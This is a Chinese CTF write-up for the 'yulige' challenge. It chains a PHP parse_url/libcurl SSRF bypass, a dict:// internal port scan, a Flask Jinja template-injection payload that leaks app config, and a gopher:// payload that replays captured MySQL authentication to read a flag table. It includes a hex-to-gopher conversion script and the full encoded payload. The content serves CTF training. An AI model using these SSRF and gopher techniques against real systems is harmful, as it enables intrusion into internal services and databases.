0%

ctf473831530_2019_yulige WP

Posted on Edited on

Dockerfile

我改了一下web2 Dockerfile 不知道为啥pip连不上官方源,用清华源终于成了

https://github.com/Imtinmin/ctf473831530_2019_web1_yulige

分析

给了源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
<?php 
highlight_file(__FILE__);
function check_inner_ip($url) 

    $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url); 
    if (!$match_result) 
    { 
        die('url fomat error'); 
    } 
    try 
    { 
        $url_parse=parse_url($url); 
    } 
    catch(Exception $e) 
    { 
        die('url fomat error'); 
        return false
    } 
    $hostname=$url_parse['host']; 
    $ip=gethostbyname($hostname); 
    $int_ip=ip2long($ip); 
    return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16


function safe_request_url($url) 

     
    if (check_inner_ip($url)) 
    { 
        echo $url.' is inner ip'
    } 
    else 
    {
        $ch = curl_init(); 
        curl_setopt($ch, CURLOPT_URL, $url); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
        curl_setopt($ch, CURLOPT_HEADER, 0); 
        $output = curl_exec($ch); 
        $result_info = curl_getinfo($ch); 
        if ($result_info['redirect_url']) 
        { 
            safe_request_url($result_info['redirect_url']); 
        } 
        curl_close($ch); 
        var_dump($output); 
    } 
     


$url = $_GET['url']; 
if(!empty($url)){ 
    safe_request_url($url); 
}

hint: flag.php

要ssrf访问flag.php

1
$url_parse=parse_url($url);

parse_url 和 libcurl 处理的差异 导致ssrf
参考

https://www.anquanke.com/post/id/86527

https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf

image.png

例如:

1
http://foo@127.0.0.1@1.1.1.1

那么parse_url 会解析Host为1.1.1.1 而libcurl Host为127.0.0.1以此达到ssrf目的
于是

image.png

于是拿到内网ip范围

172.11.243.0/24

hint2 常见端口

dict扫一遍

image.png

81有一个flask :8080
218 有个mysql 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
   import flask
import os
app = flask.Flask(__name__)
app.config['HINT'] = os.environ.pop('HINT')
@app.route('/')
def index():
return open(__file__).read()
@app.route('/yulige/<path:yulige>')
def yulige(yulige):
def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist])+s
return flask.render_template_string(safe_jinja(yulige))
if __name__ == '__main__':
app.run("0.0.0.0",port=8080)

参考twctf2018

https://ctftime.org/task/6505

1
?url=http://foo@172.11.243.81:8080/yulige/{{g.__repr__.__func__.__globals__._app_ctx_stack.top.app.config}}@1.1.1.1

image.png

得到hint:mysql_user_is_yuligeeee123321

gopher 打 mysql

1
2
3
4
5
mysql -uroot -p
create user 'yuligeeee123321'@'localhost';
create database fla4441111g;
use fla4441111g;
grant all privileges on `*` to 'yuligeeee123321'@'localhost';
1
2
3
4
tcpdump -i lo port 3306 -w mysql.pcap
mysql -h 127.0.0.1 -uyuligeeee123321 -p
use fla4441111g;select * from F1111llllggggg;
exit

用wireshark打开mysql.pcap

image.png

1
2
3
4
5
6
7
8
9
ae00000185a6ff010000000121000000000000000000000000000000000000000000000079756c69676565656531323333323100006d7973716c5f6e61746976655f70617373776f72640066035f6f73054c696e75780c5f636c69656e745f6e616d65086c69626d7973716c045f7069640532303633360f5f636c69656e745f76657273696f6e06352e372e3236095f706c6174666f726d067838365f36340c70726f6772616d5f6e616d65056d7973716c
210000000373656c65637420404076657273696f6e5f636f6d6d656e74206c696d69742031
120000000353454c4543542044415441424153452829
0c00000002666c613434343131313167
0f0000000373686f7720646174616261736573
0c0000000373686f77207461626c6573
100000000446313131316c6c6c6c676767676700
1d0000000373656c656374202a2066726f6d2046313131316c6c6c6c6767676767
0100000001

换到一行

1
2
3
4
5
6
7
8
9
#coding:utf-8

def results(s):
    a=[s[i:i+2] for i in xrange(0,len(s),2)]
    return "curl gopher://172.11.243.218:3306/_%"+"%".join(a)
if __name__=="__main__":
    import sys
    s=sys.argv[1]
    print(results(s))

用这个脚本转成payload,打过去,false……what?
url编码一下

最终payload

1
?url=gopher://172.11.243.218:3306/%5f%25%61%65%25%30%30%25%30%30%25%30%31%25%38%35%25%61%36%25%66%66%25%30%31%25%30%30%25%30%30%25%30%30%25%30%31%25%32%31%25%30%30%25%30%30%25%30%30%25%30%30%25%30%30%25%30%30%25%30%30%25%30%30%25%30%30%25%30%30%25%30%30%25%30%30%25%30%30%25%30%30%25%30%30%25%30%30%25%30%30%25%30%30%25%30%30%25%30%30%25%30%30%25%30%30%25%30%30%25%37%39%25%37%35%25%36%63%25%36%39%25%36%37%25%36%35%25%36%35%25%36%35%25%36%35%25%33%31%25%33%32%25%33%33%25%33%33%25%33%32%25%33%31%25%30%30%25%30%30%25%36%64%25%37%39%25%37%33%25%37%31%25%36%63%25%35%66%25%36%65%25%36%31%25%37%34%25%36%39%25%37%36%25%36%35%25%35%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%66%25%37%32%25%36%34%25%30%30%25%36%36%25%30%33%25%35%66%25%36%66%25%37%33%25%30%35%25%34%63%25%36%39%25%36%65%25%37%35%25%37%38%25%30%63%25%35%66%25%36%33%25%36%63%25%36%39%25%36%35%25%36%65%25%37%34%25%35%66%25%36%65%25%36%31%25%36%64%25%36%35%25%30%38%25%36%63%25%36%39%25%36%32%25%36%64%25%37%39%25%37%33%25%37%31%25%36%63%25%30%34%25%35%66%25%37%30%25%36%39%25%36%34%25%30%35%25%33%32%25%33%30%25%33%36%25%33%33%25%33%36%25%30%66%25%35%66%25%36%33%25%36%63%25%36%39%25%36%35%25%36%65%25%37%34%25%35%66%25%37%36%25%36%35%25%37%32%25%37%33%25%36%39%25%36%66%25%36%65%25%30%36%25%33%35%25%32%65%25%33%37%25%32%65%25%33%32%25%33%36%25%30%39%25%35%66%25%37%30%25%36%63%25%36%31%25%37%34%25%36%36%25%36%66%25%37%32%25%36%64%25%30%36%25%37%38%25%33%38%25%33%36%25%35%66%25%33%36%25%33%34%25%30%63%25%37%30%25%37%32%25%36%66%25%36%37%25%37%32%25%36%31%25%36%64%25%35%66%25%36%65%25%36%31%25%36%64%25%36%35%25%30%35%25%36%64%25%37%39%25%37%33%25%37%31%25%36%63%25%32%31%25%30%30%25%30%30%25%30%30%25%30%33%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%34%30%25%34%30%25%37%36%25%36%35%25%37%32%25%37%33%25%36%39%25%36%66%25%36%65%25%35%66%25%36%33%25%36%66%25%36%64%25%36%64%25%36%35%25%36%65%25%37%34%25%32%30%25%36%63%25%36%39%25%36%64%25%36%39%25%37%34%25%32%30%25%33%31%25%31%32%25%30%30%25%30%30%25%30%30%25%30%33%25%35%33%25%34%35%25%34%63%25%34%35%25%34%33%25%35%34%25%32%30%25%34%34%25%34%31%25%35%34%25%34%31%25%34%32%25%34%31%25%35%33%25%34%35%25%32%38%25%32%39%25%30%63%25%30%30%25%30%30%25%30%30%25%30%32%25%36%36%25%36%63%25%36%31%25%33%34%25%33%34%25%33%34%25%33%31%25%33%31%25%33%31%25%33%31%25%36%37%25%30%66%25%30%30%25%30%30%25%30%30%25%30%33%25%37%33%25%36%38%25%36%66%25%37%37%25%32%30%25%36%34%25%36%31%25%37%34%25%36%31%25%36%32%25%36%31%25%37%33%25%36%35%25%37%33%25%30%63%25%30%30%25%30%30%25%30%30%25%30%33%25%37%33%25%36%38%25%36%66%25%37%37%25%32%30%25%37%34%25%36%31%25%36%32%25%36%63%25%36%35%25%37%33%25%31%30%25%30%30%25%30%30%25%30%30%25%30%34%25%34%36%25%33%31%25%33%31%25%33%31%25%33%31%25%36%63%25%36%63%25%36%63%25%36%63%25%36%37%25%36%37%25%36%37%25%36%37%25%36%37%25%30%30%25%31%64%25%30%30%25%30%30%25%30%30%25%30%33%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%32%61%25%32%30%25%36%36%25%37%32%25%36%66%25%36%64%25%32%30%25%34%36%25%33%31%25%33%31%25%33%31%25%33%31%25%36%63%25%36%63%25%36%63%25%36%63%25%36%37%25%36%37%25%36%37%25%36%37%25%36%37%25%30%31%25%30%30%25%30%30%25%30%30%25%30%31

image.png

是道好题,ylg!ylg!